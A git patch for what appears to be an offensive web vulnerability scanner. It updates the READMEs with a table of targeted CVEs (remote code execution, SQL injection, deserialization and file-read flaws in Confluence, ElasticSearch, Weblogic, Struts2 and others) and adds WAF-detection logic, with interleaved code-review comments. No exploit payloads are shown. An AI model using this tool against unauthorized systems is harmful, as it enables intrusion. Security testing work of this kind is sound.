From ba309df74b5ac935b0bea2115ececfb20dd489c4 Mon Sep 17 00:00:00 2001
From: CLincat <3132002932@qq.com>
Date: Thu, 16 Jun 2022 14:34:46 +0800
Subject: [PATCH] 20220616-v1.0.9
---
README.md | 155 +++++++------
README_en-us.md | 156 +++++++------
lib/core/coreScan.py | 62 ++++-
lib/initial/config.py | 2 +-
lib/initial/language.py | 38 +++-
lib/initial/list.py | 163 +++++++++-----
lib/initial/parse.py | 8 +-
lib/tool/check.py | 2 +-
lib/tool/fingerprint.py | 182 ++++++++++++++-
lib/tool/head.py | 16 ++
lib/tool/logger.py | 1 +
payloads/AtlassianConfluence.py | 386 ++++++++++++++++++++++++++++++++
payloads/Django.py | 3 +-
payloads/ElasticSearch.py | 369 ++++++++++++++++++++++++++++++
payloads/F5BIGIP.py | 13 +-
payloads/Fastjson.py | 2 +-
payloads/Spring.py | 12 +-
payloads/ThinkPHP.py | 91 +++++++-
payloads/demo2.py | 134 +++++++++++
19 files changed, 1572 insertions(+), 223 deletions(-)
create mode 100644 lib/tool/head.py
create mode 100644 payloads/AtlassianConfluence.py
create mode 100644 payloads/ElasticSearch.py
create mode 100644 payloads/demo2.py
diff --git a/README.md b/README.md
index 2b7948f..6413e71 100644
--- a/README.md
+++ b/README.md
@@ -6,76 +6,87 @@
* 如果有什么想法、建议或者遇到了BUG, 都可以issues
**目前支持扫描的web应用程序有:**
-> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, Cicso, Django, F5-BIG-IP, Fastjson, Keycloak, Spring, ThinkPHP, Ueditor, Weblogic, Yonyou
+> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Django, ElasticSearch, F5-BIG-IP, Fastjson, Keycloak, Spring, ThinkPHP, Ueditor, Weblogic, Yonyou
目前支持扫描的web漏洞有: [点击展开]
```
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Target | Vul_id | Type | Method | Description |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| AlibabaDruid | None | unAuth | GET | 阿里巴巴Druid未授权访问 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| AlibabaNacos | CVE-2021-29441 | unAuth | GET/POST | 阿里巴巴Nacos未授权访问 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheAirflow | CVE-2020-17526 | unAuth | GET | Airflow身份验证绕过 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheAPISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX默认密钥 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheFlink | CVE-2020-17519 | FileRead | GET | Flink目录遍历 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheSolr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/任意文件读取 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheStruts2 | S2-001 | RCE | POST | Struts2远程代码执行 |
-| ApacheStruts2 | S2-005 | RCE | GET | Struts2远程代码执行 |
-| ApacheStruts2 | S2-007 | RCE | GET | Struts2远程代码执行 |
-| ApacheStruts2 | S2-008 | RCE | GET | Struts2远程代码执行 |
-| ApacheStruts2 | S2-009 | RCE | GET | Struts2远程代码执行 |
-| ApacheStruts2 | S2-012 | RCE | GET | Struts2远程代码执行 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheTomcat | CVE-2017-12615 | FileUpload | PUT | PUT方法任意文件写入 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb身份认证绕过 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Cisco | CVE-2020-3580 | XSS | POST | 思科ASA/FTD XSS跨站脚本攻击 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS跨站脚本攻击 |
-| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQL注入 |
-| Django | CVE-2018-14574 | Redirect | GET | CommonMiddleware url重定向 |
-| Django | CVE-2020-9402 | SQLinject | GET | GIS SQL注入 |
-| Django | CVE-2021-35042 | SQLinject | GET | QuerySet.order_by SQL注入 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| F5-BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP远程代码执行 |
-| F5-BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP身份认证绕过 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Fastjson | CNVD-2019-22238 | unSerialize| POST | Fastjson <=1.2.47 反序列化 |
-| Fastjson | CVE-2017-18349 | unSerialize| POST | Fastjson <= 1.2.24 反序列化 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Keycloak | CVE-2020-10770 | SSRF | GET | 使用request_uri调用未经验证的URL |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework远程代码执行 |
-| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot目录遍历 |
-| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud目录遍历 |
-| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL远程代码执行 |
-| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl远程代码执行 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ThinkPHP | CNVD-2018-24942 | RCE | GET | 未开启强制路由导致RCE |
-| ThinkPHP | CNNVD-201901-445 | RCE | POST | 核心类Request远程代码执行 |
-| ThinkPHP | None | RCE | GET | ThinkPHP2.x 远程代码执行 |
-| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids参数SQL注入 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Ueditor | None | SSRF | GET | Ueditor编辑器SSRF |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Weblogic | CVE-2020-14882 | RCE | GET | Weblogic未授权命令执行 |
-| Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic权限验证绕过 |
-| Weblogic | CVE-2019-2725 | unSerialize| POST | Weblogic wls9_async反序列化 |
-| Weblogic | CVE-2017-10271 | unSerialize| POST | Weblogic XMLDecoder反序列化 |
-| Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic 服务端请求伪造 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Yonyou | CNVD-2021-30167 | RCE | GET | 用友NC BeanShell远程命令执行 |
-| Yonyou | None | FileRead | GET | 用友ERP-NC NCFindWeb目录遍历 |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Target | Vul_id | Type | Method | Description |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Alibaba Druid | None | unAuth | GET | 阿里巴巴Druid未授权访问 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Alibaba Nacos | CVE-2021-29441 | unAuth | GET/POST | 阿里巴巴Nacos未授权访问 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Airflow | CVE-2020-17526 | unAuth | GET | Airflow身份验证绕过 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache APISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX默认密钥 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Flink | CVE-2020-17519 | FileRead | GET | Flink目录遍历 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Solr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/任意文件读取 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Struts2 | S2-001 | RCE | POST | Struts2远程代码执行 |
+| Apache Struts2 | S2-005 | RCE | GET | Struts2远程代码执行 |
+| Apache Struts2 | S2-007 | RCE | GET | Struts2远程代码执行 |
+| Apache Struts2 | S2-008 | RCE | GET | Struts2远程代码执行 |
+| Apache Struts2 | S2-009 | RCE | GET | Struts2远程代码执行 |
+| Apache Struts2 | S2-012 | RCE | GET | Struts2远程代码执行 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT | PUT方法任意文件写入 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb身份认证绕过 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Atlassian Confluence | CVE-2015-8399 | FileRead | GET | Confluence任意文件包含 |
+| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | POST | Confluence路径遍历和命令执行 |
+| Atlassian Confluence | CVE-2021-26084 | RCE | POST | Confluence Webwork Pre-Auth OGNL表达式命令注入 |
+| Atlassian Confluence | CVE-2022-26134 | RCE | GET | Confluence远程代码执行 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Cisco | CVE-2020-3580 | XSS | POST | 思科ASA/FTD XSS跨站脚本攻击 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS跨站脚本攻击 |
+| Django | CVE-2018-14574 | Redirect | GET | CommonMiddleware url重定向 |
+| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQL注入 |
+| Django | CVE-2020-9402 | SQLinject | GET | GIS SQL注入 |
+| Django | CVE-2021-35042 | SQLinject | GET | QuerySet.order_by SQL注入 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| ElasticSearch | CVE-2014-3120 | RCE | POST | ElasticSearch命令执行 |
+| ElasticSearch | CVE-2015-1427 | RCE | POST | ElasticSearch Groovy 沙盒绕过&&代码执行 |
+| ElasticSearch | CVE-2015-3337 | FileRead | GET | ElasticSearch 目录穿越 |
+| ElasticSearch | CVE-2015-5531 | FileRead | PUT/GET | ElasticSearch 目录穿越 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| F5 BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP远程代码执行 |
+| F5 BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP身份认证绕过 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Fastjson | CNVD-2017-02833 | unSerialize | POST | Fastjson <= 1.2.24 反序列化 |
+| Fastjson | CNVD-2019-22238 | unSerialize | POST | Fastjson <=1.2.47 反序列化 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Keycloak | CVE-2020-10770 | SSRF | GET | 使用request_uri调用未经验证的URL |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud目录遍历 |
+| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot目录遍历 |
+| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl远程代码执行 |
+| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL远程代码执行 |
+| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework远程代码执行 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| ThinkPHP | CVE-2018-1002015 | RCE | GET | ThinkPHP5.x 远程代码执行 |
+| ThinkPHP | CNVD-2018-24942 | RCE | GET | 未开启强制路由导致RCE |
+| ThinkPHP | CNNVD-201901-445 | RCE | POST | 核心类Request远程代码执行 |
+| ThinkPHP | None | RCE | GET | ThinkPHP2.x 远程代码执行 |
+| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids参数SQL注入 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Ueditor | None | SSRF | GET | Ueditor编辑器SSRF |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Oracle Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic 服务端请求伪造 |
+| Oracle Weblogic | CVE-2017-10271 | unSerialize | POST | Weblogic XMLDecoder反序列化 |
+| Oracle Weblogic | CVE-2019-2725 | unSerialize | POST | Weblogic wls9_async反序列化 |
+| Oracle Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic权限验证绕过 |
+| Oracle Weblogic | CVE-2020-14882 | RCE | GET | Weblogic未授权命令执行 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Yonyou | CNVD-2021-30167 | RCE | GET | 用友NC BeanShell远程命令执行 |
+| Yonyou | None | FileRead | GET | 用友ERP-NC NCFindWeb目录遍历 |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
```
@@ -133,7 +144,7 @@ Options:
http/https代理 (如: --http-proxy 127.0.0.1:8080)
--user-agent=UA 自定义User-Agent
--cookie=COOKIE 添加cookie
- --log=LOG 日志等级, 可选1-5 (默认: 1) [日志2级: 框架名称+漏洞编号+状态码] [日志3级:
+ --log=LOG 日志等级, 可选1-6 (默认: 1) [日志2级: 框架名称+漏洞编号+状态码] [日志3级:
2级内容+请求方法+请求目标+POST数据] [日志4级: 2级内容+请求数据包] [日志5级:
4级内容+响应头] [日志6级: 5级内容+响应内容]
@@ -160,15 +171,21 @@ Options:
以json格式保存扫描结果, 无漏洞时不会生成文件(如: --output-text
result.json)
+ General:
+ 通用工作参数
+
+ --no-waf 禁用waf检测
+ --batch yes/no的选项不需要用户输入, 使用默认选项
+
Lists:
漏洞列表
--list 查看所有Payload
支持的目标类型(-a参数, 不区分大小写):
- AliDruid,airflow,apisix,appweb,cisco,django,f5bigip,fastjson,flink,key
- cloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyo
- u
+ AliDruid,airflow,apisix,appweb,cisco,confluence,django,elasticsearch,f
+ 5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,strut
+ s2,ueditor,weblogic,yonyou
```
## language
diff --git a/README_en-us.md b/README_en-us.md
index 8889c56..52c2edc 100644
--- a/README_en-us.md
+++ b/README_en-us.md
@@ -5,76 +5,87 @@
* If you have any ideas, suggestions, or bugs, you can issue
**Web applications that currently support scanning:**
-> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, Cicso, Django, F5-BIG-IP, Fastjson, Keycloak, Spring, ThinkPHP, Ueditor, Weblogic, Yonyou
+> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Django, ElasticSearch, F5-BIG-IP, Fastjson, Keycloak, Spring, ThinkPHP, Ueditor, Weblogic, Yonyou
The current web vulnerabilities that support scanning: [Click on]
```
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Target | Vul_id | Type | Method | Description |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| AlibabaDruid | None | unAuth | GET | Alibaba Druid unAuthorized |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| AlibabaNacos | CVE-2021-29441 | unAuth | GET/POST | Alibaba Nacos unAuthorized |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheAirflow | CVE-2020-17526 | unAuth | GET | Airflow Authentication bypass |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheAPISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX default access token |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheFlink | CVE-2020-17519 | FileRead | GET | Flink Directory traversal |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheSolr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/FileRead |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheStruts2 | S2-001 | RCE | POST | Struts2 Remote code execution |
-| ApacheStruts2 | S2-005 | RCE | GET | Struts2 Remote code execution |
-| ApacheStruts2 | S2-007 | RCE | GET | Struts2 Remote code execution |
-| ApacheStruts2 | S2-008 | RCE | GET | Struts2 Remote code execution |
-| ApacheStruts2 | S2-009 | RCE | GET | Struts2 Remote code execution |
-| ApacheStruts2 | S2-012 | RCE | GET | Struts2 Remote code execution |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ApacheTomcat | CVE-2017-12615 | FileUpload | PUT | Put method writes to any file |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb Authentication bypass |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Cisco | CVE-2020-3580 | XSS | POST | Cisco ASA/FTD XSS |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS |
-| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQLinject |
-| Django | CVE-2018-14574 | Redirect | GET | Django CommonMiddleware URL Redirect |
-| Django | CVE-2020-9402 | SQLinject | GET | Django GIS SQLinject |
-| Django | CVE-2021-35042 | SQLinject | GET | Django QuerySet.order_by SQLinject |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| F5-BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP Remote code execution |
-| F5-BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP Authentication bypass |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Fastjson | CNVD-2019-22238 | unSerialize| POST | Fastjson <=1.2.47 deSerialization |
-| Fastjson | CVE-2017-18349 | unSerialize| POST | Fastjson <= 1.2.24 deSerialization |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Keycloak | CVE-2020-10770 | SSRF | GET | request_uri SSRF |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework Remote code execution |
-| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot Directory traversal |
-| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud Directory traversal |
-| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL Remote code execution |
-| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl Remote code execution |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| ThinkPHP | CNVD-2018-24942 | RCE | GET | The forced route is not enabled Remote code execution |
-| ThinkPHP | CNNVD-201901-445 | RCE | POST | Core class Request Remote code execution |
-| ThinkPHP | None | RCE | GET | ThinkPHP2.x Remote code execution |
-| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids SQLinject |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Ueditor | None | SSRF | GET | Ueditor SSRF |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Weblogic | CVE-2020-14882 | RCE | GET | Weblogic Unauthorized command execution |
-| Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic Authentication bypass |
-| Weblogic | CVE-2019-2725 | unSerialize| POST | Weblogic wls9_async deSerialization |
-| Weblogic | CVE-2017-10271 | unSerialize| POST | Weblogic XMLDecoder deSerialization |
-| Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic SSRF |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
-| Yonyou | CNVD-2021-30167 | RCE | GET | Yonyou-NC BeanShell Remote code execution |
-| Yonyou | None | FileRead | GET | Yonyou-ERP-NC NCFindWeb Directory traversal |
-+---------------+------------------+------------+----------+------------------------------------------------------------+
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Target | Vul_id | Type | Method | Description |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Alibaba Druid | None | unAuth | GET | Alibaba Druid unAuthorized |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Alibaba Nacos | CVE-2021-29441 | unAuth | GET/POST | Alibaba Nacos unAuthorized |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Airflow | CVE-2020-17526 | unAuth | GET | Airflow Authentication bypass |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache APISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX default access token |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Flink | CVE-2020-17519 | FileRead | GET | Flink Directory traversal |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Solr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/FileRead |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Struts2 | S2-001 | RCE | POST | Struts2 Remote code execution |
+| Apache Struts2 | S2-005 | RCE | GET | Struts2 Remote code execution |
+| Apache Struts2 | S2-007 | RCE | GET | Struts2 Remote code execution |
+| Apache Struts2 | S2-008 | RCE | GET | Struts2 Remote code execution |
+| Apache Struts2 | S2-009 | RCE | GET | Struts2 Remote code execution |
+| Apache Struts2 | S2-012 | RCE | GET | Struts2 Remote code execution |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT | Put method writes to any file |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb Authentication bypass |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Atlassian Confluence | CVE-2015-8399 | FileRead | GET | Confluence any file include |
+| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | POST | Confluence Directory traversal && RCE |
+| Atlassian Confluence | CVE-2021-26084 | RCE | POST | Confluence OGNL expression command injection |
+| Atlassian Confluence | CVE-2022-26134 | RCE | GET | Confluence Remote code execution |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Cisco | CVE-2020-3580 | XSS | POST | Cisco ASA/FTD XSS |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS |
+| Django | CVE-2018-14574 | Redirect | GET | Django CommonMiddleware URL Redirect |
+| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQLinject |
+| Django | CVE-2020-9402 | SQLinject | GET | Django GIS SQLinject |
+| Django | CVE-2021-35042 | SQLinject | GET | Django QuerySet.order_by SQLinject |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| ElasticSearch | CVE-2014-3120 | RCE | POST | ElasticSearch Remote code execution |
+| ElasticSearch | CVE-2015-1427 | RCE | POST | ElasticSearch Groovy Sandbox to bypass && RCE |
+| ElasticSearch | CVE-2015-3337 | FileRead | GET | ElasticSearch Directory traversal |
+| ElasticSearch | CVE-2015-5531 | FileRead | PUT/GET | ElasticSearch Directory traversal |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| F5 BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP Remote code execution |
+| F5 BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP Authentication bypass |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Fastjson | CNVD-2017-02833 | unSerialize | POST | Fastjson <= 1.2.24 deSerialization |
+| Fastjson | CNVD-2019-22238 | unSerialize | POST | Fastjson <=1.2.47 deSerialization |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Keycloak | CVE-2020-10770 | SSRF | GET | request_uri SSRF |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud Directory traversal |
+| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot Directory traversal |
+| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl Remote code execution |
+| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL Remote code execution |
+| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework Remote code execution |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| ThinkPHP | CVE-2018-1002015 | RCE | GET | ThinkPHP5.x Remote code execution |
+| ThinkPHP | CNVD-2018-24942 | RCE | GET | The forced route is not enabled Remote code execution |
+| ThinkPHP | CNNVD-201901-445 | RCE | POST | Core class Request Remote code execution |
+| ThinkPHP | None | RCE | GET | ThinkPHP2.x Remote code execution |
+| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids SQLinject |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Ueditor | None | SSRF | GET | Ueditor SSRF |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Oracle Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic SSRF |
+| Oracle Weblogic | CVE-2017-10271 | unSerialize | POST | Weblogic XMLDecoder deSerialization |
+| Oracle Weblogic | CVE-2019-2725 | unSerialize | POST | Weblogic wls9_async deSerialization |
+| Oracle Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic Authentication bypass |
+| Oracle Weblogic | CVE-2020-14882 | RCE | GET | Weblogic Unauthorized command execution |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
+| Yonyou | CNVD-2021-30167 | RCE | GET | Yonyou-NC BeanShell Remote code execution |
+| Yonyou | None | FileRead | GET | Yonyou-ERP-NC NCFindWeb Directory traversal |
++----------------------+------------------+--------------+----------+------------------------------------------------------------+
```
@@ -133,7 +144,7 @@ Options:
127.0.0.1:8080)
--user-agent=UA Customize the User-Agent
--cookie=COOKIE Add a cookie
- --log=LOG The log level, Optional 1-5 (default: 1) [level 2:
+ --log=LOG The log level, Optional 1-6 (default: 1) [level 2:
Framework name + Vulnerability number + status code]
[level 3: Level 2 content + request method + request
target +POST data] [level 4: Level 2 content + request
@@ -167,15 +178,22 @@ Options:
will not generate files(e.g. --output-text
result.json)
+ General:
+ General operating parameter
+
+ --no-waf Disable WAF detection
+ --batch The yes/no option does not require user input. The
+ default option is used
+
Lists:
Vulnerability list
--list View all payload
Supported target types(Case insensitive):
- AliDruid,airflow,apisix,appweb,cisco,django,f5bigip,fastjson,flink,key
- cloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyo
- u
+ AliDruid,airflow,apisix,appweb,cisco,confluence,django,elasticsearch,f
+ 5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,strut
+ s2,ueditor,weblogic,yonyou
```
## language
diff --git a/lib/core/coreScan.py b/lib/core/coreScan.py
index 76909d0..be4f048 100644
--- a/lib/core/coreScan.py
+++ b/lib/core/coreScan.py
@@ -7,6 +7,7 @@
from lib.tool.logger import logger
from lib.tool import check
from lib.report import output
+from lib.tool.fingerprint import identify
from payloads.AlibabaDruid import alidruid
from payloads.AlibabaNacos import nacos
from payloads.ApacheAirflow import airflow
@@ -16,8 +17,10 @@
from payloads.ApacheTomcat import tomcat
from payloads.ApacheStruts2 import struts2
from payloads.AppWeb import appweb
+from payloads.AtlassianConfluence import confluence
from payloads.Cisco import cisco
from payloads.Django import django
+from payloads.ElasticSearch import elasticsearch
from payloads.F5BIGIP import f5bigip
from payloads.Fastjson import fastjson
from payloads.ThinkPHP import thinkphp
@@ -38,6 +41,9 @@ def __init__(self):
self.delay = config.get('delay') # * 延时
self.url_list = config.get('url_list') # * url列表
self.app_list = config.get('app_list') # * 框架列表
+ self.batch = config.get('batch')
+ self.no_waf = config.get('no_waf') # * 是否启用WAF指纹识别
+ # self.web_app = config.get('web_app') # * 是否启用框架指纹识别
self.thread_list = [] # * 已经运行的线程列表
self.results = [] # * 结果列表
self.queue = Queue() # * 创建线程池
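Review bot: `self.batch = config.get('batch')` is the one new attribute in this hunk without a purpose comment, unlike its neighbours; suggest `self.batch = config.get('batch')  # * --batch: answer yes/no prompts with the default`. The commented-out `# self.web_app = config.get('web_app')` line below it is dead code and should either be dropped or become a TODO stating why framework fingerprinting is disabled. `__init__` continues outside the hunk.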
@@ -48,8 +54,37 @@ def __init__(self):
def start(self):
''' 开始扫描, 添加poc并启动 '''
- for u in self.url_list: # * 遍历urls
- logger.info('yellow_ex', self.lang['core']['start']['start'] + u) # ? 提示, 开始扫描当前url
+ for u in self.url_list: # * 遍历urls
+ logger.info('yellow_ex', self.lang['core']['start']['start'] + u) # ? 提示, 开始扫描当前url
+
+ # * --------------------WAF指纹识别--------------------
+ if (not self.no_waf):
+ waf_info = identify.waf_identify(u) # * WAF指纹识别
+ if waf_info:
+ while True:
+ if (not self.batch): # * 是否使用默认选项
+ logger.info('red', '', print_end='')
+ operation = input(self.lang['core']['start']['waf_find'].format(waf_info)) # * 接收参数
+ else:
+ logger.info('red', self.lang['core']['start']['waf_find'].format(waf_info), print_end='')
+ operation = 'no' # * 默认选项No
+ logger.info('red', 'no', notime=True)
+
+ operation = operation.lower() # * 字母转小写
+ if operation in ['y', 'yes']: # * 继续扫描
+ logger.info('yellow_ex', self.lang['core']['stop']['continue']) # ? 日志, 继续扫描
+ break
+ elif operation in ['n', 'no']:
+ logger.info('yellow_ex', self.lang['core']['stop']['next']) # ? 日志, 下一个
+ u = 'next'
+ break
+ else:
+ logger.info('yellow_ex', self.lang['core']['start']['waf_not_find'])
+
+ if u == 'next':
+ continue
+ # * --------------------WAF指纹识别--------------------
+
if check.check_connect(u):
self.addPOC(u) # * 为url添加poc 并加入线程池
self.scanning() # * 开始扫描该url
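Review bot: The `n`/`no` branch signals "skip this target" by overwriting the loop variable (`u = 'next'`) and then testing `if u == 'next'`, which conflates the URL with control flow and would misfire on a target literally named `next`; use a flag instead: `skip_url = False` before the `if (not self.no_waf):` block, `skip_url = True` in place of `u = 'next'`, and `if skip_url: continue`. The fallback branch for unrecognized input logs `self.lang['core']['start']['waf_not_find']`, which by its name reads like the "no WAF found" message rather than an "unrecognized input, try again" prompt — worth confirming against language.py. Also, `identify.waf_identify(u)` runs before `check.check_connect(u)`, so an unreachable target is fingerprinted before its reachability is checked; unless waf_identify handles connection failures itself (not visible here), moving the connectivity check first avoids that. `start` continues past the end of the hunk.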
